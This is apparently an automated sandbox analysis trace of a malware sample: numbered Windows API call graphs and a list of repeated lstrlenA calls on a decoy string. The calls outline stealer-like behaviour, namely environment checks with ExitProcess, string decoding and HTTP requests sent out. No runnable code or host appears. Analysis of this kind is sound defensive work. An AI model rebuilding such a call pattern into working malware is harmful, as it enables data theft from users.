API calls 26612->26613 26614 4031bd 26613->26614 26615 4045c0 34 API calls 26614->26615 26616 4031d6 26615->26616 26617 4045c0 34 API calls 26616->26617 26618 4031ef 26617->26618 26619 4045c0 34 API calls 26618->26619 26620 403208 26619->26620 26621 4045c0 34 API calls 26620->26621 26622 403221 26621->26622 26623 4045c0 34 API calls 26622->26623 26624 40323a 26623->26624 26625 4045c0 34 API calls 26624->26625 26626 403253 26625->26626 26627 4045c0 34 API calls 26626->26627 26628 40326c 26627->26628 26629 4045c0 34 API calls 26628->26629 26630 403285 26629->26630 26631 4045c0 34 API calls 26630->26631 26632 40329e 26631->26632 26633 4045c0 34 API calls 26632->26633 26634 4032b7 26633->26634 26635 4045c0 34 API calls 26634->26635 26636 4032d0 26635->26636 26637 4045c0 34 API calls 26636->26637 26638 4032e9 26637->26638 26639 4045c0 34 API calls 26638->26639 26640 403302 26639->26640 26641 4045c0 34 API calls 26640->26641 26642 40331b 26641->26642 26643 4045c0 34 API calls 26642->26643 26644 403334 26643->26644 26645 4045c0 34 API calls 26644->26645 26646 40334d 26645->26646 26647 4045c0 34 API calls 26646->26647 26648 403366 26647->26648 26649 4045c0 34 API calls 26648->26649 26650 40337f 26649->26650 26651 4045c0 34 API calls 26650->26651 26652 403398 26651->26652 26653 4045c0 34 API calls 26652->26653 26654 4033b1 26653->26654 26655 4045c0 34 API calls 26654->26655 26656 4033ca 26655->26656 26657 4045c0 34 API calls 26656->26657 26658 4033e3 26657->26658 26659 4045c0 34 API calls 26658->26659 26660 4033fc 26659->26660 26661 4045c0 34 API calls 26660->26661 26662 403415 26661->26662 26663 4045c0 34 API calls 26662->26663 26664 40342e 26663->26664 26665 4045c0 34 API calls 26664->26665 26666 403447 26665->26666 26667 4045c0 34 API calls 26666->26667 26668 403460 26667->26668 26669 4045c0 34 API calls 26668->26669 26670 403479 26669->26670 26671 4045c0 34 API calls 26670->26671 26672 403492 26671->26672 26673 4045c0 34 API calls 26672->26673 26674 4034ab 26673->26674 26675 4045c0 34 API calls 26674->26675 26676 4034c4 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 4034dd 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 4034f6 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 40350f 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 403528 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 403541 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 40355a 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 403573 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 40358c 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 4035a5 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 4035be 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 4035d7 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 4035f0 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 403609 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 403622 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 40363b 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 403654 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 40366d 26709->26710 26711 4045c0 34 API calls 26710->26711 26712 403686 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 40369f 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 4036b8 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 4036d1 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 4036ea 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 403703 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 40371c 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 403735 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 40374e 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 403767 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 403780 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 403799 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 4037b2 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 4037cb 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 4037e4 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 4037fd 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 403816 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 40382f 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 403848 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 403861 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 40387a 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 403893 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 4038ac 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 4038c5 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 4038de 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 4038f7 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 403910 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 403929 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 403942 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 40395b 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 403974 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 40398d 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 4039a6 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 4039bf 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 4039d8 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 4039f1 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 403a0a 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 403a23 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 403a3c 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 403a55 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 403a6e 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 403a87 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 403aa0 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 403ab9 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 403ad2 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 403aeb 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 403b04 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 403b1d 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 403b36 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 403b4f 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 403b68 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 403b81 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 403b9a 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 403bb3 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 403bcc 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 403be5 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 403bfe 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 403c17 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 403c30 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 403c49 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 403c62 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 403c7b 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 403c94 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 403cad 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 403cc6 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 403cdf 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 403cf8 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 403d11 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 403d2a 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 403d43 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 403d5c 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 403d75 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 403d8e 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 403da7 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 403dc0 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 403dd9 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 403df2 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 403e0b 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 403e24 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 403e3d 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 403e56 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 403e6f 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 403e88 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 403ea1 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 403eba 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 403ed3 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 403eec 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 403f05 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 403f1e 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 403f37 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 403f50 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 403f69 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 403f82 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 403f9b 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 403fb4 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 403fcd 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 403fe6 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403fff 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 404018 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 404031 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 40404a 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 404063 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 40407c 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 404095 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 4040ae 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 4040c7 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 4040e0 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 4040f9 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 404112 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 40412b 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 404144 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 40415d 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 404176 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 40418f 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 4041a8 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 4041c1 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 4041da 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 4041f3 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 40420c 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 404225 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 40423e 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 404257 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 404270 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 404289 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 4042a2 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 4042bb 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 4042d4 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 4042ed 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 404306 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 40431f 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 404338 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 404351 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 40436a 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 404383 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 40439c 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 4043b5 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 4043ce 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 4043e7 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 404400 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 404419 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 404432 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 40444b 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 404464 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 40447d 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 404496 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 4044af 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 4044c8 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 4044e1 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 4044fa 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 404513 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 40452c 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 404545 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 40455e 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 404577 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 404590 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 4045a9 27021->27022 27023 419c10 27022->27023 27024 419c20 43 API calls 27023->27024 27025 41a036 8 API calls 27023->27025 27024->27025 27026 41a146 27025->27026 27027 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27025->27027 27028 41a153 8 API calls 27026->27028 27029 41a216 27026->27029 27027->27026 27028->27029 27030 41a298 27029->27030 27031 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27029->27031 27032 41a2a5 6 API calls 27030->27032 27033 41a337 27030->27033 27031->27030 27032->27033 27034 41a344 9 API calls 27033->27034 27035 41a41f 27033->27035 27034->27035 27036 41a4a2 27035->27036 27037 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27035->27037 27038 41a4ab GetProcAddress GetProcAddress 27036->27038 27039 41a4dc 27036->27039 27037->27036 27038->27039 27040 41a515 27039->27040 27041 41a4e5 GetProcAddress GetProcAddress 27039->27041 27042 41a612 27040->27042 27043 41a522 10 API calls 27040->27043 27041->27040 27044 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27042->27044 27045 41a67d 27042->27045 27043->27042 27044->27045 27046 41a686 GetProcAddress 27045->27046 27047 41a69e 27045->27047 27046->27047 27048 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27047->27048 27049 415ca3 27047->27049 27048->27049 27050 401590 27049->27050 27324 401670 27050->27324 27053 41a7a0 lstrcpy 27054 4015b5 27053->27054 27055 41a7a0 lstrcpy 27054->27055 27056 4015c7 27055->27056 27057 41a7a0 lstrcpy 27056->27057 27058 4015d9 27057->27058 27059 41a7a0 lstrcpy 27058->27059 27060 401663 27059->27060 27061 415510 27060->27061 27062 415521 27061->27062 27063 41a820 2 API calls 27062->27063 27064 41552e 27063->27064 27065 41a820 2 API calls 27064->27065 27066 41553b 27065->27066 27067 41a820 2 API calls 27066->27067 27068 415548 27067->27068 27069 41a740 lstrcpy 27068->27069 27070 415555 27069->27070 27071 41a740 lstrcpy 27070->27071 27072 415562 27071->27072 27073 41a740 lstrcpy 27072->27073 27074 41556f 27073->27074 27075 41a740 lstrcpy 27074->27075 27088 41557c 27075->27088 27076 4152c0 29 API calls 27076->27088 27077 4151f0 23 API calls 27077->27088 27078 415643 StrCmpCA 27078->27088 27079 4156a0 StrCmpCA 27080 4157dc 27079->27080 27079->27088 27081 41a8a0 lstrcpy 27080->27081 27082 4157e8 27081->27082 27083 41a820 2 API calls 27082->27083 27086 4157f6 27083->27086 27084 41a740 lstrcpy 27084->27088 27085 41a820 lstrlenA lstrcpy 27085->27088 27089 41a820 2 API calls 27086->27089 27087 415856 StrCmpCA 27087->27088 27090 415991 27087->27090 27088->27076 27088->27077 27088->27078 27088->27079 27088->27084 27088->27085 27088->27087 27091 41a8a0 lstrcpy 27088->27091 27098 415a0b StrCmpCA 27088->27098 27105 401590 lstrcpy 27088->27105 27111 41578a StrCmpCA 27088->27111 27114 41593f StrCmpCA 27088->27114 27115 41a7a0 lstrcpy 27088->27115 27093 415805 27089->27093 27092 41a8a0 lstrcpy 27090->27092 27091->27088 27094 41599d 27092->27094 27095 401670 lstrcpy 27093->27095 27096 41a820 2 API calls 27094->27096 27113 415811 27095->27113 27097 4159ab 27096->27097 27099 41a820 2 API calls 27097->27099 27100 415a16 Sleep 27098->27100 27101 415a28 27098->27101 27103 4159ba 27099->27103 27100->27088 27102 41a8a0 lstrcpy 27101->27102 27104 415a34 27102->27104 27106 401670 lstrcpy 27103->27106 27107 41a820 2 API calls 27104->27107 27105->27088 27106->27113 27108 415a43 27107->27108 27109 41a820 2 API calls 27108->27109 27110 415a52 27109->27110 27112 401670 lstrcpy 27110->27112 27111->27088 27112->27113 27113->26171 27114->27088 27115->27088 27117 417553 GetVolumeInformationA 27116->27117 27118 41754c 27116->27118 27124 417591 27117->27124 27118->27117 27119 4175fc GetProcessHeap HeapAlloc 27120 417619 27119->27120 27121 417628 wsprintfA 27119->27121 27122 41a740 lstrcpy 27120->27122 27123 41a740 lstrcpy 27121->27123 27125 415da7 27122->27125 27123->27125 27124->27119 27125->26192 27127 41a7a0 lstrcpy 27126->27127 27128 404899 27127->27128 27333 4047b0 27128->27333 27130 4048a5 27131 41a740 lstrcpy 27130->27131 27132 4048d7 27131->27132 27133 41a740 lstrcpy 27132->27133 27134 4048e4 27133->27134 27135 41a740 lstrcpy 27134->27135 27136 4048f1 27135->27136 27137 41a740 lstrcpy 27136->27137 27138 4048fe 27137->27138 27139 41a740 lstrcpy 27138->27139 27140 40490b InternetOpenA StrCmpCA 27139->27140 27141 404944 27140->27141 27142 404ecb InternetCloseHandle 27141->27142 27341 418b60 27141->27341 27144 404ee8 27142->27144 27356 409ac0 CryptStringToBinaryA 27144->27356 27145 404963 27349 41a920 27145->27349 27148 404976 27150 41a8a0 lstrcpy 27148->27150 27155 40497f 27150->27155 27151 41a820 2 API calls 27152 404f05 27151->27152 27153 41a9b0 4 API calls 27152->27153 27156 404f1b 27153->27156 27154 404f27 codecvt 27158 41a7a0 lstrcpy 27154->27158 27159 41a9b0 4 API calls 27155->27159 27157 41a8a0 lstrcpy 27156->27157 27157->27154 27171 404f57 27158->27171 27160 4049a9 27159->27160 27161 41a8a0 lstrcpy 27160->27161 27162 4049b2 27161->27162 27163 41a9b0 4 API calls 27162->27163 27164 4049d1 27163->27164 27165 41a8a0 lstrcpy 27164->27165 27166 4049da 27165->27166 27167 41a920 3 API calls 27166->27167 27168 4049f8 27167->27168 27169 41a8a0 lstrcpy 27168->27169 27170 404a01 27169->27170 27172 41a9b0 4 API calls 27170->27172 27171->26195 27173 404a20 27172->27173 27174 41a8a0 lstrcpy 27173->27174 27175 404a29 27174->27175 27176 41a9b0 4 API calls 27175->27176 27177 404a48 27176->27177 27178 41a8a0 lstrcpy 27177->27178 27179 404a51 27178->27179 27180 41a9b0 4 API calls 27179->27180 27181 404a7d 27180->27181 27182 41a920 3 API calls 27181->27182 27183 404a84 27182->27183 27184 41a8a0 lstrcpy 27183->27184 27185 404a8d 27184->27185 27186 404aa3 InternetConnectA 27185->27186 27186->27142 27187 404ad3 HttpOpenRequestA 27186->27187 27189 404b28 27187->27189 27190 404ebe InternetCloseHandle 27187->27190 27191 41a9b0 4 API calls 27189->27191 27190->27142 27192 404b3c 27191->27192 27193 41a8a0 lstrcpy 27192->27193 27194 404b45 27193->27194 27195 41a920 3 API calls 27194->27195 27196 404b63 27195->27196 27197 41a8a0 lstrcpy 27196->27197 27198 404b6c 27197->27198 27199 41a9b0 4 API calls 27198->27199 27200 404b8b 27199->27200 27201 41a8a0 lstrcpy 27200->27201 27202 404b94 27201->27202 27203 41a9b0 4 API calls 27202->27203 27204 404bb5 27203->27204 27205 41a8a0 lstrcpy 27204->27205 27206 404bbe 27205->27206 27207 41a9b0 4 API calls 27206->27207 27208 404bde 27207->27208 27209 41a8a0 lstrcpy 27208->27209 27210 404be7 27209->27210 27211 41a9b0 4 API calls 27210->27211 27212 404c06 27211->27212 27213 41a8a0 lstrcpy 27212->27213 27214 404c0f 27213->27214 27215 41a920 3 API calls 27214->27215 27216 404c2d 27215->27216 27217 41a8a0 lstrcpy 27216->27217 27218 404c36 27217->27218 27219 41a9b0 4 API calls 27218->27219 27220 404c55 27219->27220 27221 41a8a0 lstrcpy 27220->27221 27222 404c5e 27221->27222 27223 41a9b0 4 API calls 27222->27223 27224 404c7d 27223->27224 27225 41a8a0 lstrcpy 27224->27225 27226 404c86 27225->27226 27227 41a920 3 API calls 27226->27227 27228 404ca4 27227->27228 27229 41a8a0 lstrcpy 27228->27229 27230 404cad 27229->27230 27231 41a9b0 4 API calls 27230->27231 27232 404ccc 27231->27232 27233 41a8a0 lstrcpy 27232->27233 27234 404cd5 27233->27234 27235 41a9b0 4 API calls 27234->27235 27236 404cf6 27235->27236 27237 41a8a0 lstrcpy 27236->27237 27238 404cff 27237->27238 27239 41a9b0 4 API calls 27238->27239 27240 404d1f 27239->27240 27241 41a8a0 lstrcpy 27240->27241 27242 404d28 27241->27242 27243 41a9b0 4 API calls 27242->27243 27244 404d47 27243->27244 27245 41a8a0 lstrcpy 27244->27245 27246 404d50 27245->27246 27247 41a920 3 API calls 27246->27247 27248 404d6e 27247->27248 27249 41a8a0 lstrcpy 27248->27249 27250 404d77 27249->27250 27251 41a740 lstrcpy 27250->27251 27252 404d92 27251->27252 27253 41a920 3 API calls 27252->27253 27254 404db3 27253->27254 27255 41a920 3 API calls 27254->27255 27256 404dba 27255->27256 27257 41a8a0 lstrcpy 27256->27257 27258 404dc6 27257->27258 27259 404de7 lstrlenA 27258->27259 27260 404dfa 27259->27260 27261 404e03 lstrlenA 27260->27261 27355 41aad0 27261->27355 27263 404e13 HttpSendRequestA 27264 404e32 InternetReadFile 27263->27264 27265 404e67 InternetCloseHandle 27264->27265 27270 404e5e 27264->27270 27268 41a800 27265->27268 27267 41a9b0 4 API calls 27267->27270 27268->27190 27269 41a8a0 lstrcpy 27269->27270 27270->27264 27270->27265 27270->27267 27270->27269 27365 41aad0 27271->27365 27273 4117c4 StrCmpCA 27274 4117d7 27273->27274 27275 4117cf ExitProcess 27273->27275 27276 4117e7 strtok_s 27274->27276 27289 4117f4 27276->27289 27277 4119c2 27277->26197 27278 41199e strtok_s 27278->27289 27279 4118ad StrCmpCA 27279->27289 27280 4118cf StrCmpCA 27280->27289 27281 4118f1 StrCmpCA 27281->27289 27282 411951 StrCmpCA 27282->27289 27283 411970 StrCmpCA 27283->27289 27284 411913 StrCmpCA 27284->27289 27285 411932 StrCmpCA 27285->27289 27286 41185d StrCmpCA 27286->27289 27287 41187f StrCmpCA 27287->27289 27288 41a820 lstrlenA lstrcpy 27288->27289 27289->27277 27289->27278 27289->27279 27289->27280 27289->27281 27289->27282 27289->27283 27289->27284 27289->27285 27289->27286 27289->27287 27289->27288 27290 41a820 2 API calls 27289->27290 27290->27278 27291->26203 27292->26205 27293->26211 27294->26213 27295->26219 27296->26221 27297->26225 27298->26229 27299->26233 27300->26239 27301->26241 27302->26245 27303->26259 27304->26262 27305->26263 27306->26258 27307->26263 27308->26278 27309->26266 27310->26269 27311->26272 27312->26275 27313->26280 27314->26282 27315->26289 27316->26295 27317->26316 27318->26320 27319->26319 27320->26315 27321->26319 27322->26329 27325 41a7a0 lstrcpy 27324->27325 27326 401683 27325->27326 27327 41a7a0 lstrcpy 27326->27327 27328 401695 27327->27328 27329 41a7a0 lstrcpy 27328->27329 27330 4016a7 27329->27330 27331 41a7a0 lstrcpy 27330->27331 27332 4015a3 27331->27332 27332->27053 27361 401030 27333->27361 27337 404838 lstrlenA 27364 41aad0 27337->27364 27339 404848 InternetCrackUrlA 27340 404867 27339->27340 27340->27130 27342 41a740 lstrcpy 27341->27342 27343 418b74 27342->27343 27344 41a740 lstrcpy 27343->27344 27345 418b82 GetSystemTime 27344->27345 27346 418b99 27345->27346 27347 41a7a0 lstrcpy 27346->27347 27348 418bfc 27347->27348 27348->27145 27350 41a931 27349->27350 27351 41a988 27350->27351 27353 41a968 lstrcpy lstrcatA 27350->27353 27352 41a7a0 lstrcpy 27351->27352 27354 41a994 27352->27354 27353->27351 27354->27148 27355->27263 27357 409af9 LocalAlloc 27356->27357 27358 404eee 27356->27358 27357->27358 27359 409b14 CryptStringToBinaryA 27357->27359 27358->27151 27358->27154 27359->27358 27360 409b39 LocalFree 27359->27360 27360->27358 27362 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27361->27362 27363 41aad0 27362->27363 27363->27337 27364->27339 27365->27273 27499 416ab1 903 API calls 27468 4069f3 7 API calls 27500 40a6ebc VirtualProtect 27437 40b04b7 88 API calls 27438 40b0cb6 30 API calls 27504 41cafe 219 API calls 5 library calls 27441 40b15b3 strtok_s 27533 40b13c7 strtok_s strtok_s lstrlen lstrcpy 25936 401190 25943 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 25936->25943 25938 40119e 25939 4011cc 25938->25939 25945 417850 GetProcessHeap HeapAlloc GetUserNameA 25938->25945 25941 4011b7 25941->25939 25942 4011c4 ExitProcess 25941->25942 25944 417939 25943->25944 25944->25938 25946 4178c3 25945->25946 25946->25941 27442 40b3823 7 API calls 27443 40b30d0 9 API calls 27512 41ce9f 69 API calls __amsg_exit 27447 40bcce9 162 API calls getSystemCP 27448 4088a4 RaiseException task __CxxThrowException@8 27449 4180a5 GetProcessHeap HeapFree 27471 40b19e7 StrCmpCA ExitProcess strtok_s strtok_s 27472 40b35e4 9 API calls 27473 41b9b0 RtlUnwind 27450 40b30f9 7 API calls

                    Control-flow Graph

                    APIs
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                    • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                    • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
